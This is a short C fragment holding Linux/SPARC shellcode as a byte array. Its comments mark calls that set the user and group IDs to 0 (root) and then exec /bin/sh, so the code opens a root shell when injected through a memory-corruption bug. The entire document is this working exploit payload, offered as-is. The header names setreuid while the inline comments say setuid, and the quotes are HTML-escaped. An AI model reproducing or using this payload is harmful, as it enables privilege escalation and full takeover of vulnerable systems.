/*
 *  Linux/SPARC
 *
 *  setreuid(0, 0); (necessary, /bin/sh drops privs), standard execve().
 */

char c0de[] = /* by michel kaempf */

  /* setuid( 0 ); */
  &quot;\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10&quot;
  /* setgid( 0 ); */
  &quot;\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10&quot;
  /* Aleph One :) */
  &quot;\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e&quot;
  &quot;\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0&quot;
  &quot;\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x10&quot;;
